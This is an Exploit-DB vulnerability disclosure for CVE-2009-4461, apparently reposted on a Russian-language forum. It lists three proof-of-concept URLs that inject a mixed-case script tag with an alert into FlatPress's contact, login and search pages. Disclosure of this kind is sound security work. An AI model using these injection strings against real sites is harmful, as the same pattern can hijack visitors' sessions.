- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 10688
- Проверка EDB
-
- Пройдено
- Автор
- INDOUSHKA
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-4461
- Дата публикации
- 2009-12-26
Код:
========================================================================================
| # Title : FlatPress Cross Site Scripting Vulnerability |
| # Author : indoushka |
| # email : [email protected] |
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) |
| # Web Site : www.iq-ty.com |
| # Script : powered by FlatPress / http://www.flatpress.org/ |
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
| # Bug : XSS |
====================== Exploit By indoushka =================================
| # Exploit :
|
| 1- http://server/flatpress/contact.php/>"><ScRiPt>alert(+213771818860)</ScRiPt>
| 2- http://server/flatpress/login.php/>"><ScRiPt>alert(+213771818860)</ScRiPt>
| 3- http://server/flatpress/search.php/>"><ScRiPt>alert(+213771818860)</ScRiPt>
|
================================ Dz-Ghost Team ========================================
Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 |
-------------------------------------------------------------------------------------------- Источник
- www.exploit-db.com
